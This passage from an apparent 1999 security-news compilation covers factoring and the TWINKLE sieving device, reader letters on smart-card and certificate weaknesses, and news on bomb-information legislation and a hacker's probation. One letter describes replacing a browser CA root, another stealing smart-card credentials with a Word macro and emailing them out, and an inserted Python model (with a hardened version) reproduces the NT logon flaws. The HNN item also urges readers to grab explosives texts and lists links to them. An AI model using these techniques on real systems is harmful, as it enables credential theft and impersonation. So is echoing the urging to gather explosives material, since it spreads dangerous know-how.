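            x = x * xi % n
            total = [t + e for t, e in zip(total, exps)]
    y = 1
    for p, e in zip(factor_base, total):
        y = y * pow(p, e // 2, n) % n
    return x, y


def factor(n, bound=30):
    """Sieve, then linear algebra, then gcd. Returns (p, q) with p*q == n, or None."""
    factor_base = small_primes(bound)
    relations = sieving_step(n, factor_base, len(factor_base) + 5)
    for combo in matrix_step(relations):
        x, y = congruence_of_squares(n, relations, factor_base, combo)
        for cand in (gcd(x - y, n), gcd(x + y, n)):
            if 1 < cand < n:
                return (cand, n // cand)
    return None


if __name__ == "__main__":
    for n in (8051, 1649):
        print(n, "=", factor(n))
```

Real sieves (the number field sieve used on RSA-140) differ in how they pick candidates and how large the factor base is, but the shape is the same: the relation count must exceed the factor-base size so that a dependency exists, and the matrix grows with that factor base, which is why the second step, not the first, dominates memory for large moduli.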
Shamir conceptualized a special hardware device that uses electro-optical
techniques to sieve at speeds much faster than normal computers. He
encodes various LEDs with values corresponding to prime numbers, and then
uses it to factor numbers. The machine reminds me of the famous Difference
Engine of the 1800s. Once the engineering kinks are worked out -- and
there are considerable ones -- this machine will be as powerful as 100-1000
PCs for about $5000. The basic idea is not new; a mechanical-optical
machine built by D.H. Lehmer in the 1930s did much the same thing (although
quite a bit more slowly).
As far as we know, Shamir's machine has never been built. (I can't speak
for secret organizations.) As I said, Shamir presented a conceptualization
and a sketch of a design, not a full set of engineering blueprints. There
are all sorts of details still to be figured out, but none of them seem
impossible. If I were running a multi-billion-dollar intelligence
organization, I would turn my boffins loose at the problem.
The important thing to note is that this new machine does not affect the
matrix step at all. And this step explodes in complexity for large
factoring problems; its complexity grows much faster than the complexity of
the sieving step. And it's not just the time, it's the memory
requirements. With a 1024-bit number, for example, the matrix step
requires something like ten terabytes of memory: not off-line storage, but
real computer memory. No one has a clue how to solve that kind of problem.
This technique works just as well for discrete-logarithm public-key
algorithms (Diffie-Hellman, ElGamal, DSA, etc.) as it does for RSA,
although it is worth noting that the matrix problem is harder for
discrete-log problems than it is for factoring. The technique does not
apply to elliptic-curve-based algorithms, as we don't know how to use the
sieving-based algorithms to solve elliptic-curve problems.
In "Applied Cryptography," I talked about advances in factoring coming from
four different directions. One, faster computers. Two, better networking.
Three, optimizations and tweaks of existing factoring algorithms. And
four, fundamental advances in the science of factoring. TWINKLE falls in
categories one and three; there is no new mathematics in this machine, it's
just a much faster way of doing existing mathematics.
Shamir's contribution is obvious once you understand it (the hallmark of a
brilliant contribution, in my opinion), and definitely changes the
landscape of what public-key key sizes are considered secure. The moral is
that it is prudent to be conservative -- all well-designed security
products went beyond 512-bit moduli years ago -- and that advances in
cryptography can come from the strangest places.
Shamir's paper:
http://jya.com/twinkle.eps
The RSA Data Security opinion:
http://www.rsa.com/rsalabs/html/twinkle.html.
** *** ***** ******* *********** *************
Comments from Readers
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Subject: Attacking Certificates with Computer Viruses
>So if you're a paranoid computer-security professional,
>the obvious question to ask is: can a rogue piece of
>software replace the root-level certificates in my browser
>and trick me into trusting someone? Of course it can.
You don't even need rogue software, all you need is Internet Explorer. Try
this: Using your favorite certificate toolkit, create a CA root certificate
which is identical to an existing one (except for the key) and stick it in
a web page. Click on the link with MSIE. You'll be presented with a
dialog telling you you're about to accept a new certificate from, for example,
"Verisign Class 1 Public Primary Certification Authority". Once you've
clicked OK (as virtually all users will), you've replaced the standard CA
root with your own one, and can use it to certify rogue servers, CA's,
email, viruses, and whatever else you feel like. There's no warning
presented by MSIE, it just quietly replaces the existing cert.
(Hint: You may want to test this with one of the lesser-used CA's rather
than Verisign, because even ignoring the security implications it's a
significant denial-of-service attack. This hole may have been fixed in
newer versions of MSIE, but it worked fine in 3.02, which is the last
version which doesn't try to take over your machine when you install it).
From: Ed Gerck <egerck@mcg.org.br>
Subject: Re: Smart Card Threats
I enjoyed reading your paper on smart-card security issues (Cryptogram
Apr/15/1999). I find it specially useful since it provides yet more
examples where trust cannot be seen as an objective property of a system,
not even for some of its parts. I believe the same applies to all systems,
though -- however unperceived in most cases. Smart-cards are thus IMO no
better and no worse in principle than a computer on the Net. Trust is
essentially subjective and thus any recognizable part of any system can
operate within its own and different trust truth-conditions -- potentially
leading to different trust-values when in interaction with other parts,
perhaps from other systems and also differently for each other part,
history, and time. At the end, the main question is thus not whether it is
a smart-card or a computer on your desk -- but whether you can rely upon it
for your decisions (i.e., trust it within a specific extent and epoch, for
specific trust-points). Which may be easier to accept for a smart-card
that you always carry with you in contrast to a computer that you never
see, such as a server -- but not necessarily, as your paper exemplifies.
I would like to comment also on another part of your newsletter, where you
have the title "Trusting the Known" -- since, of course, no one can trust
the unknown. IMO, the gist of your text is "Trusting with Qualification"
which introduces the discussion on the *degree* of such qualification as
you then proceed to do. I also note that it is possible to trust without
qualification on the trusted matter itself, even though you must know it --
and that such may even apply to what you analyzed, as when a spy in a
spy-ring trusts the key handed down by the spymaster, in an objective way
as an "authorization" and entirely based on his trust on the spymaster...
not on the key's qualifications.
From: jmm@elegant.com (John Macdonald)
Subject: "In cryptography, there is security in following the crowd"
Careful how you phrase that. As written, it could easily be used to
justify choosing Microsoft PPP rather than IPSec because that is where "the
crowd" has led.
Nobody who reads and understands the article would consider the masses
generally unknowledgeable about cryptography to be the right "crowd" to
follow of course, but I shudder to think of this article being read by a
marketing droid looking for the catch-phrases for his next ad campaign, or
a purchasing agent being challenged about an all-Microsoft buying policy.
From: hecker@netscape.com (Frank Hecker)
Subject: Re: CRYPTO-GRAM, April 15, 1999
>Other Internet protocols -- S/MIME, SSL, etc. -- take a more
>hierarchical approach. You probably got your public key
>signed by a company like Verisign. A Web site's SSL public
>key might have been signed by Netscape.
>This attack isn't without problems. If a virus replaces the
>root Netscape certificate with a phony one....
For the record, Netscape does not sign web sites' public keys (i.e., act as
a Certificate Authority for them); I don't believe Netscape has ever
performed this service. Thus there is no "root Netscape certificate"
included in the Netscape Navigator and Netscape Communicator products, if
by that you mean a certificate for a hypothesized Netscape CA. Netscape
Navigator and Netscape Communicator as shipped do include root CA
certificates for a number of public CA services, and we recommend that our
customers use those services (unless they wish to act as their own CA).
This doesn't of course change the underlying argument of your article,
concerning the vulnerability to replacement of the included root certificate
list; I just wanted to correct a minor error of fact.
From: "hans@netman.se" <hans@netman.se>
Subject: Smart-Card Flaws
For the last 2.5 years I've been responsible for the security issues when
implementing a large Smart Card based authorization concept for Windows NT
4.0 here in Sweden and here are 3 major flaws I've encountered when dealing
with smart cards:
1) When connecting to an NT server your user name, password and X509v3
certificate are sent to the server. The server starts a challenge response
using the public key in the certificate and encrypts a random value. The
encrypted random value and the server certificate are then sent to the
smart card and decrypted with the corresponding private key. Then the
smart card encrypts the random value with the server's public key in the
server certificate and sends it back to the server, which compares the two
values. Since there is no connection between the value in the X509
certificate (subject field and Common Name) and the user ID you may enter
some other person's ID and password which are sent with your certificate.
So the strong authentication will begin using your Public and private RSA
keys but you will get the other person's privileges and access rights!
2) On an RSA based smart card you usually store the user id and password on
the data area (SSO table = Single Sign On Table) -- the problem lies in the
fact that the smart cards offered today are limited in storage data, such
as certificates and user IDs and passwords, to 8K maximum. (You may find
cards on the market that can store more than 8K data but you can't buy them
yet.) So if we use certificates with RSA based keys stored in them, which
are 1024 bits long, you may only have 2 certificates and 2 corresponding
private keys. If we use RSA based keys stored in a smart card that are 512
bits long, we can store 3 certificates in them. And since 512 bit RSA keys
are in the Wassenaar agreement and you may export them, you can't trust
them :-). So we used 1024 bits keys instead and used them for
authentication and encryption. So the following will then happen. You
enter the PIN that opens the card AND opens for usage of the certificate
and private key for authentication/encryption since we want to do a strong
authentication of the user. I can then decrypt anything that the user of
the smart card has encrypted since the usage of the private key is opened
by the user when he enters his PIN! If I can get the user to execute a
Trojan horse program the user will not even know that I'm decrypting
something he encrypted with his private key! Therefore you can't encrypt
the user id and the password stored on the smart card! So I can read this
from the smart card and get user id and the corresponding password and
email it to me! (I've done this once using just Visual Basic for
Application and a macro stored in the normal.dot)
3) If we do a challenge response in an NT environment the server needs to
know which work station/server he is talking to. So in your case the
server program used WINS to get the IP-address from the workstation name.
This opened to a nice attack:
The user logged in on an NT workstation using his smart card and was
authenticated by challenge response. We sent an email to the user that
included a macro in the normal.dot and got the workstation's name from the
workstation, and user id and password from the smart card. We then got
another NT workstation and named it as the user's workstation name and
tried to get a connection to a disk on the NT server. We were prompted
for user ID and password, which we entered and voila! We got access to the
disk! The server in this case got the workstation name, the user id and
password and used WINS to find the corresponding IP address for that
workstation name. Then the server did a strong authentication on the IP
address that the server got from WINS. That IP address was not our
machine's IP address, it was the user's IP address! In the NT security log
we could read that the user logged in to that disk and that he was
authenticated by the use of strong authentication.
So the question is: Can you rely on Smart Cards? And my answer is: Yes, if
you know what they can do and what they can't!
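The two server-side mistakes behind flaws 1 and 3 above, modelled as an added example in Python (this is not code from the letter or from any real NT component; the card, directory, WINS table and addresses are constructed, and an HMAC stands in for the RSA challenge-response):

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Certificate:
    subject_cn: str  # X.509 subject Common Name on the card's certificate
    key_id: str      # stand-in for the certificate's public key


class SmartCard:
    """Constructed card: answers a challenge with an HMAC over a card-held
    secret, standing in for the RSA decrypt/re-encrypt round trip in the letter."""

    def __init__(self, cert: Certificate, secret: bytes):
        self.cert = cert
        self._secret = secret

    def answer(self, challenge: bytes) -> str:
        return hmac.new(self._secret, challenge, hashlib.sha256).hexdigest()


# Constructed server-side state.
KEY_TABLE = {"key-alice": b"alice-card-secret"}      # key_id -> verification key
DIRECTORY = {"Alice Andersson": "alice"}             # certificate CN -> user id
PASSWORDS = {"alice": "pw-alice", "bob": "pw-bob"}   # user id -> password
WINS = {"WS-ALICE": "10.0.0.11"}                     # workstation name -> IP
# Which card is inserted at which workstation (models the server "reaching"
# a workstation to run the challenge-response against it).
CARDS_AT = {"10.0.0.11": SmartCard(Certificate("Alice Andersson", "key-alice"),
                                   b"alice-card-secret")}


def proves_key(card: SmartCard) -> bool:
    """Fresh challenge; the card must answer with the key named in its cert."""
    verify_key = KEY_TABLE.get(card.cert.key_id)
    if verify_key is None:
        return False
    challenge = secrets.token_bytes(16)
    expected = hmac.new(verify_key, challenge, hashlib.sha256).hexdigest()
    return hmac.compare_digest(card.answer(challenge), expected)


def logon_as_described(user_id: str, password: str, workstation_name: str):
    """The flow from the letter. Flaw 3: the workstation to authenticate is
    found by a WINS lookup of a name the client typed, not the connection
    that is asking. Flaw 1: the granted identity is the typed user id, never
    compared with the certificate that answered the challenge."""
    if PASSWORDS.get(user_id) != password:
        return None
    target_ip = WINS.get(workstation_name)
    card = CARDS_AT.get(target_ip)
    if card is None or not proves_key(card):
        return None
    return {"user": user_id, "authenticated_ip": target_ip}


def logon_hardened(user_id: str, password: str, peer_ip: str):
    """Challenge the card on the requesting connection's own peer address,
    then derive the identity from the verified certificate's subject and
    insist that it matches the claimed user id."""
    if PASSWORDS.get(user_id) != password:
        return None
    card = CARDS_AT.get(peer_ip)
    if card is None or not proves_key(card):
        return None
    if DIRECTORY.get(card.cert.subject_cn) != user_id:
        return None  # Alice's card cannot log on as Bob
    return {"user": user_id, "authenticated_ip": peer_ip}


if __name__ == "__main__":
    # A machine at 10.0.0.99 with Alice's stolen password, claiming to be WS-ALICE.
    print(logon_as_described("alice", "pw-alice", "WS-ALICE"))  # granted, logged as 10.0.0.11
    print(logon_hardened("alice", "pw-alice", "10.0.0.99"))     # None
    # Alice's own workstation, but Bob's id and password typed in.
    print(logon_as_described("bob", "pw-bob", "WS-ALICE"))      # Bob's rights via Alice's card
    print(logon_hardened("bob", "pw-bob", "10.0.0.11"))         # None
```

The hardened version also rejects a card whose key is unknown to the server and any request whose password is wrong, so the security log entry can only ever name the peer that actually answered the challenge.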
** *** ***** ******* *********** *************
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
Please feel free to forward CRYPTO-GRAM to colleagues and friends who will
find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as
it is reprinted in its entirety.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
Counterpane Systems is a six-person consulting firm specializing in
cryptography and computer security. Counterpane provides expert consulting
in: design and analysis, implementation and testing, threat modeling,
product research and forecasting, classes and training, intellectual
property, and export consulting. Contracts range from short-term design
evaluations and expert opinions to multi-year development efforts.
http://www.counterpane.com/
Copyright (c) 1999 by Bruce Schneier
@HWA
40.0 [ISN] Why I'm a security pessimist
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Traumatic Dog <waste@zor.hut.fi>
Why I'm a Security Pessimist
URL: http://chkpt.zdnet.com/chkpt/adem2fpf/www.anchordesk.com/story/story_3377.html
Jesse Berst, Editorial Director
ZDNet AnchorDesk
Wednesday, May 12, 1999
We're still in the primitive days of the Internet. So we still expect some
security problems. And we assume they'll get better. Right? Wrong.
The security problem is getting worse. Headlines tell me Internet security
lapses are becoming more common. Even the White House isn't safe. Click for
more. And Melissa showed us viruses are growing more wily. We're all at the
mercy of corner-cutting software vendors, inexperienced e-tailers and smart-ass
programmers.
WHY YOU ARE MORE VULNERABLE
There's no single culprit. Much of it has to do with changing times:
As the Internet is more widely used, the potential for good and bad increases
By expanding networks, companies create more opportunity for security breaches
As competition gets more intense, vendors push products out the door faster
As product complexity increases, bugs are more likely
As ecommerce explodes, vendors are rushing to set up shop online
WHERE YOU ARE MOST VULNERABLE
Computer users are being impacted at work, at home, online:
The number of software bugs tracked in the BugNet database grew nearly 20-fold
in the past five years. The bug explosion costs employers millions of hours in
lost productivity
The insidious Melissa virus, which infected over 100,000 computers in the
U.S., was a nuisance; weeks later the destructive CIH virus crashed more than
half a million computers in South Korea and Turkey
E-businesses are unwittingly exposing private customer information, including
names, addresses and credit card info; last month 100 sites with improperly
installed shopping carts were identified
HOW TO LIMIT YOUR VULNERABILITY
You can't prevent bugs, viruses and inept e-tailers. But there are ways to
protect yourself.
Your computer. If events of recent months didn't persuade you to obtain
anti-virus software for your PC, maybe this quick click to free, five-star
anti-virus downloads will do the trick. Click for more. Bookmark the Help
Channel's Bug section for the latest bug alerts, patches and workarounds for
your software and hardware. Click for more.
Your company. PC Magazine Labs evaluated three families of antivirus products
that protect every major LAN component. Click for more. If your company conducts
business over the Internet, two major security holes you need to plug are DNS
spoofing and attacks on dial-up connections. Click for more.
Your personal information. Make sure before you relinquish any personal
information the Web site has the TRUSTe seal of approval and/or a privacy
statement you can live with. Click for more. Or become a stealth browser; the
Help Channel details how to maintain a low profile on the Web. Click for more.
For even more resources, visit the Security and Privacy Briefing Centers I've
linked in the sidebar.
And please use the TalkBack button to tell me if you agree things are getting
worse, not better. You're also welcome to join the discussion at my Berst Alerts
forum.
[snip..]
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
41.0 Bombs Off The Net!
~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Bombs Off the Net, Senate Says
contributed by g0rn
New legislation recently tacked onto the Violent and Repeat Juvenile Offender Accountability and
Rehabilitation Act will make 'bomb-making information' on the net illegal. The law would also apply
to any form of distribution--books, magazines, or videos. Well we suggest that you get copies of any
information you feel may be threatened now and sock it away.
C|Net
http://www.news.com/News/Item/0,4,36785,00.html?st.ne.fd.mdh.ni
textfiles.com- Get 'em while you can
http://www.textfiles.com/
Bombing victims held a press conference yesterday to
plead with Internet companies to purge or block Web
sites that carry recipes for building bombs. How come
no one is protesting the local library or the High School
chemistry book? Why does everyone always pick on the
internet?
Nando Times
http://www.techserver.com/story/body/0,1634,50706-81476-578139-0,00.html
Wired
http://www.wired.com/news/news/politics/story/19785.html
Late Update
This information is fast disappearing from the web. The
above site textfiles.com has already removed the
relevant sections (at least temporarily). We suggest you
grab what you can while you can.
The Anarchists Cookbook
http://www.amazon.com/exec/obidos/ASIN/0962303208/thehackernewsnet
Highly Explosive Pyrotechnic Compositions
http://www.amazon.com/exec/obidos/ASIN/0873648277/thehackernewsnet
Homemade C-4 : A Recipe for Survival
http://www.amazon.com/exec/obidos/ASIN/0873645588/thehackernewsnet
Improvised Explosives : How to Make Your Own
http://www.amazon.com/exec/obidos/ASIN/0873643208/thehackernewsnet
303.org has graciously mirrored the missing sections
from textfiles.com. They are still working on it but some
stuff is available now.
303.org
http://www.303.org/explosives/
The stories;
C|Net;
Senate blasts bomb-making info on Net
By Courtney Macavinta
Staff Writer, CNET News.com
May 19, 1999, 1:00 p.m. PT
Distributing bomb-making information on the Net would be illegal in most cases under Senate legislation being
debated in the wake of the killings at Columbine High School in Littleton, Colorado, and a rash of subsequent threats
at campuses around the country.
With an 85-13 vote, Sens. Dianne Feinstein (D-California) and Orrin Hatch (R-Utah) successfully tacked an amendment onto the
Violent and Repeat Juvenile Offender Accountability and Rehabilitation Act yesterday. The provision prohibits teaching or
demonstrating how to make explosives with the "intent" that the information will be used to commit a federal crime.
The law would apply to any form of distribution--books, magazines, or videos, for example. However, like measures Feinstein has
pushed in the past, the Net is once again the focal point. That's because the two teenagers, who witnesses say killed 13 people
in Littleton, reportedly documented their weapon-making and massacre plans online.
"The youngsters in Colorado who perpetrated the crime indicated they got the formula for the pipe bombs directly from the
Internet," Feinstein stated on the Senate floor.
The same bill, which is still being debated today, also would require that Net access providers offer customers filtering
technologies and bans online gun or explosives sales that would violate existing laws.
But First Amendment experts are alarmed by the bomb-making provision. They say it could apply to people who aren't inciting
violence.
"If a high school chemistry teacher posts online material for a course that he knows could be used to build a device, it's entirely
possible that someone unknown to the teacher will use it to commit a federal crime of violence," said Barry Steinhardt, associate
director of the American Civil Liberties Union. "That is problematic, because on the Net you can't know the intent of your
audience."
But Hatch says to be prosecuted, publishers would have to encourage violence along with the posting of bomb-making data. The
Senator pointed to the Animal Liberation Front's Web site as an example of the type of material he wants to outlaw. The site has
a pamphlet, Final Nail #2, which includes diagrams about how to build devices to set off fire alarm sprinklers or to damage stores
that sell fur coats.
"It is a detailed guide to terrorist activities," Hatch said on the Senate floor.
"Why someone feels the need to put such harmful material on the Internet is beyond me; there certainly is no legitimate need for
our kids to know how to make a bomb," he added. "[If a] person crosses the line to advocate the use of that knowledge for violent
criminal purposes, or gives it out knowing it will be used for such purposes, then the law needs to cover that conduct."
Although the Hatch-Feinstein amendment targets only those whose "intent" is to incite violence, free speech watchdogs today
echoed concerns they have with a recent federal court decision in Oregon that held online speakers liable for inciting offline
violence.
In that case, U.S. District Judge Robert Jones issued a permanent injunction prohibiting a group of abortion foes from distributing
"wanted" posters that list abortion providers' personal information and redistributing the data on sites such as the Nuremberg
Files, which called for the "baby butchers" to be "brought to justice." The case is under appeal.
"What remains to be resolved by the courts is 'how far is too far' in making information available that could be used in the
commission of a crime," said David Sobel, general counsel at the Electronic Privacy Information Center.
"I have concerns about how the [bomb-making] language might be applied," he added. "Provisions like this are subject to abuse in
the hands of an overzealous prosecutor."
Still other legal experts said the amendment likely would pass constitutional tests.
"There are serious constitutional questions about regulating information about making bombs," said Lance Rose, author of
NetLaw. "If this law is passed and it survives any constitutional challenges, there will be a fundamental proposition that you can
regulate bomb information at least sometimes."
But Rose added: "It's a slippery slope. Once you have a law like this in place, the question is, 'How far can they go?'"
Despite the free speech debate, legal experts say lawmakers' campaigns to rid the Net of bomb-making information won't
necessarily help to curb access to such information.
"There is ample information available about this offline, including information from the Agricultural Department and U.S. military
training manuals," the ACLU's Steinhardt said. "The Net is a global medium--a lot of information also comes from outside of the
United States. This measure is totally futile."
-=-
Wired;
-=-
Victims Want Bomb Sites Off Web
Reuters
5:50 p.m. 19.May.99.PDT
The brother of convicted Unabomber Theodore Kaczynski, a victim of one of his bombings, and the mother of a victim
of the Oklahoma City bombing made a plea on Wednesday for Internet companies to purge or block Web sites
that carry recipes for building bombs.
David Kaczynski, Unabomber victim Gary Wright, and Marsha Kight, whose daughter died in the Oklahoma City blast,
appeared at a news conference to ask America Online, Microsoft, Walt Disney, and Yahoo to police the vast array of
Web sites on a voluntary basis.
Access to violent sites, particularly by children, has come under sharp focus since the Littleton, Colorado high school
shootings, where one of the teenage killers detailed the building of pipe bombs on the Web a year earlier.
David Kaczynski, who has made few public statements since he exposed his brother as the Unabomber, said that he
saw a parallel between his and his wife's decision to turn his brother in to authorities and the issue that faces
Internet companies.
"It was absolutely agonizing for us to make the decision to turn in my brother," said Kaczynski, a social worker in upstate
New York. "I think it's much less agonizing for Internet companies, and they ought to do it."
Wright, a Salt Lake City software executive, was injured when he picked up a Unabomber bomb behind a computer
store where he worked in 1987. Kight's 23-year-old daughter was among the 168 people who died in the 1995 bombing of
the Oklahoma City federal office building.
Writing letters to AOL, Microsoft, Disney - which is part owner of the Go Network -- and Yahoo, the victims and a New
York-based group called the Centre for Community Interest want host companies to scan for and delete bomb-making
instructions and to block access to such sites through search engines.
Industry spokesmen said that companies do what they can, but they questioned whether it is possible to scan the content
of every Web site, particularly if a bomb recipe, for example, contains just chemical ingredients and no violent or
hateful language.
Dennis Saffran, head of CCI, which also has defended pornography-shop restrictions and panhandling bans, said
that the call would not violate the constitutional right to free speech because they are seeking the voluntary
cooperation of private companies.
But, he added, limited government regulation might be needed if companies don't participate on a voluntary basis.
"We're giving every troubled kid out there the tools to become a Tim McVeigh or a Ted Kaczynski," he said.
@HWA
42.0 Dark Spyre may end up in jail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Dark Spyre May end up in Jail
contributed by erewhon
A year shy of completing his probation after being indicted on two counts of felony theft in January 1995,
Dark Spyre (Ryan David Schwartz) may soon end up behind bars. For several weeks in 1993-94 Dark Spyre
worked on breaking the codes of a long-distance phone company based in Mississippi. Part of his sentence for
these crimes was probation. Now his probation may be revoked. The Assistant District Attorney claims that he
violated his probation when he used a computer. Dark Spyre claims that the closest he has gotten to a
computer is when he asked a schoolmate to type a paper for him. Allowing someone else to use a computer
on Schwartz's behalf, is the same as if Schwartz had used it, the DA said.
ComputerNews Daily
http://199.97.97.16/IMDS%7CCND7%7Cread%7C/home/content/users/imds/feeds/nytsyn/1999/05/18/cndin/1297-0139-pat_nytimes%7C/home/content/users/imds/feeds/nytsyn/1999/05/18/cndin/1301-0143-pat_nytimes%7C/home/content/users/imds/feeds/nytsyn/1999/05/18/cndin/
Former Hacker in a Probation Struggle
PATTI MUCK
c.1999 Houston Chronicle
SUGAR LAND, Texas -- From the blackness of his bedroom, Dark
Spyre would be awakened by a desk lamp clicking on.
Hooked to his computer, it would signal him - sometimes in the middle
of the night - that a fellow hacker was ready to begin.
For several weeks in late 1993 and early 1994, Ryan David Schwartz,
alias Dark Spyre, was a high school senior by day, a computer hacker by
night. Breaking the security code of a long-distance phone company based in
Mississippi, he was able to charge thousands of dollars worth of computer
bulletin board calls to the company.
When Sugar Land police showed up at the Houston-area home he
shared with his grandparents and mother in March 1994, Schwartz
confessed to hacking. They took his computer, all of the components, even
the desk lamp.
Indicted on two counts of felony theft a month after his graduation, he
pleaded guilty in January 1995. He was sentenced to five years' deferred
adjudication - a punishment that would expunge the conviction from his
record if successfully completed - plus 450 hours of community service,
court costs and nearly $5,000 restitution.
Now, just a year shy of completing his probation, Schwartz faces a
motion to revoke the probation. Revocation could send him to prison and
end his pursuit of a degree at Baylor University in Waco.
From Schwartz's perspective, the Fort Bend County District
Attorney's Office set him up for failure from the start and has treated him
more like a violent criminal than an intelligent young man who made a mistake
and was willing to pay for it.
From the prosecutor's perspective, Schwartz has been thumbing his
nose at the court and deserves to be punished.
Not only has he ignored probation conditions that included orders not
to use a computer, but he has abused a string of second chances, Assistant
District Attorney Mike Elliott said.
``It's a shame in a lot of ways, because he's a bright kid,'' said Elliott,
who, coincidentally, is the computer expert in his office. ``But he just can't
leave it alone. He's got an addiction.''
Schwartz denied violating his probation. He insisted that he has been
walking the straight and narrow - working nearly full-time at a Service
Merchandise store in Waco, attending classes at Baylor and frantically
rushing back to Fort Bend County every Friday afternoon to meet with his
probation officer.
Sugar Land, an affluent community just outside of Houston, is about
150 miles from Waco.
He said he has not used a computer and that fellow students have
typed papers for him, which, according to his understanding of the probation,
was allowed.
Elliott said the ruling was clear: Schwartz is forbidden from using a
computer, period. Allowing someone else to use a computer on Schwartz's
behalf, and using Schwartz's password, is the same as if Schwartz had used
it, Elliott said.
``I'm just trying to get school done and get a degree and get a career
going,'' said Schwartz, now 23.
Elliott contended that Schwartz doesn't merit pity. Not only did
Schwartz ignore a warning from LDDS Metromedia Communications, the
long-distance company, to stop hacking long before the criminal charges
were filed, but he also violated his probation by accessing the Internet and
using a computer, the prosecutor said.
``It's a game to them,'' he said of computer hackers. ``They don't see
the danger, the real harm in what they're doing. Many people are under the
misconception that if you do a crime on the computer, it's not that bad, like
murdering somebody.
``But it is a crime - a felony crime. How many people's phone bills
went up because of acts he and others did? Everybody pays for his kind of
crime.''
Schwartz's probation problems started early, when he contended that
his severe asthma prevented him from the lawn-cutting and outdoor
maintenance chores that are typical of community service.
He had enrolled at the University of Houston in August 1994 and
attended classes there through May 1995. After his enrollment at Baylor in
July 1995, the community-service hours became more difficult to complete.
In September 1997, the first motion to revoke Schwartz's probation
was filed, alleging that he had failed to report to the probation department in
February, May and June 1996 and that he had failed to perform community
service. A probation department report said Schwartz hadn't done service
for a year.
It also maintained that, even after being referred to light duty because
of his asthma, Schwartz failed to report for community service in Waco.
He denied that, saying he had reported but wasn't given an assignment
compatible with his health.
At one point, he was instructed to clean out a dark, cellarlike room at a
Waco charitable organization, he said. It was, he said, infested with rats, an
environment his asthma was unable to tolerate.
He kept the job for only one day. A promised assignment in a library
never materialized.
``I was willing to do the work,'' he said.
After a hearing in December 1997, state District Judge Bradley Smith
did not revoke his probation but made several changes in its terms.
Schwartz was given an additional 600 hours of community service, to
be completed by Jan. 1, 1999. And he was forbidden from operating a
computer without written court permission.
Schwartz took off a semester and reported for work daily at the
Precinct 4 justice-of-the-peace office to complete his community service. His
mother, Linda Schwartz, a secretary, paid the restitution, and his
grandparents, Greta and Izu Schwartz, 71 and 73 respectively, helped pay
lawyer and bond fees.
Already, the family had stacked up about $50,000 in payments to bail
bondsmen and lawyers.
The family thought that the ordeal was nearing an end and that
Schwartz could finish college and get his degree in finance and management
information systems. He wants to have a career in financial consulting or
investments.
Schwartz applied for early termination of his probation after he
completed his community service, but was turned down.
Although the court granted his request to return to Baylor, he was told
to report to the probation office in Richmond at 4 p.m. every Friday.
Schwartz said he did his best to comply, leaving as soon as classes or work
were through and driving hard to make the deadline. But he was late three
times, clocking in at 4:25 p.m. one time, at 4:31 p.m. another time and at
4:16 p.m. another.
After using several lawyers, the family hired Houston attorney Dick
DeGuerin to try again to get the probation terminated early. Schwartz
obtained a letter from an associate dean at Baylor, saying he lacked 39 hours
to graduate and would have to have access to a computer to complete his
course work.
An assistant professor at Baylor wrote to Judge Smith, asking that
Schwartz be allowed to use a computer ``and move on to a career in
business.''
While supportive letters were filling Schwartz's court file, Elliott was
getting tips that the probationer was actively using the computer, the Internet
and e-mail at Baylor.
The second motion to revoke his probation was filed in March. It is set
for a June 10 hearing before Smith, who has a reputation around the
courthouse of being tough on wayward probationers.
The Schwartz family views the latest development as continued torture,
referring to Elliott as a persecutor instead of a prosecutor.
``The goal is to put him in jail. That's what they want,'' said Linda
Schwartz, 47. ``He was young and foolish,'' she said, but he has paid for his
mistake. ``Now we don't know what to do. We're going crazy.''
Elliott, meanwhile, is preparing for the hearing. If Schwartz's probation
is revoked, he could receive two to 10 years in prison.
``How many times can you thumb your nose at the court and get away
with it?'' Elliott asked. ``He would have had a very bright future with some
company. Why couldn't he do something constructive with his time instead of
trying to beat the system?''
-----
(The Houston Chronicle web site is at http://www.chron.com/ )
@HWA
43.0 ACTINIC ecommerce package claims to be 'unhackable'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Actinic Catalog 3.0 called "Unhackable"
contributed by Weld Pond
Actinic Software LLC has Actinic Catalog 3.0, a plug-and-play e-commerce software package. The
company is making the claim that it uses unhackable technology. It almost sounds like an invitation.
Will people ever learn that nothing is unhackable? It all depends on time and energy. Something says
that the marketing department probably didn't run the press release by the engineers before they
released it.
Update: May 21st HNN rumours section reports that www.actinic.com was supposedly cracked...(unconfirmed)
Excite News
http://news.excite.com:80/news/bw/990517/nj-actinic-software
Actinic Catalog 3.0 Offers Total Security for Online Shopping; "Unhackable"
Technology Prevents Hackers from Accessing Online Ordering Information
Updated 9:53 AM ET May 17, 1999
EAST BRUNSWICK, N.J. (BUSINESS WIRE) - Actinic Software LLC, a leading provider of plug-and-play e-commerce
software, today announced that its flagship product, Actinic Catalog 3.0, offers total security for online shoppers.
Catalog 3.0 is a low-cost, easy-to-use software package that provides all the tools for e-commerce merchants to rapidly build
and deploy secure online stores. The software's military-strength security eliminates vulnerabilities for merchants and their
customers, ensuring that sensitive information cannot be compromised.
Recent breaches in e-commerce security have turned a critical eye to the safety of online shopping. Some platforms, whether
ill-equipped or improperly installed, save customer order information in a decrypted file on the server, exposed to anyone with
access to the Internet. This not only includes the experienced hacker, but the average Web surfer with the right search terms.
Unlike other third-party e-commerce systems, Catalog 3.0 encrypts all financial details on the Web server, which is deleted
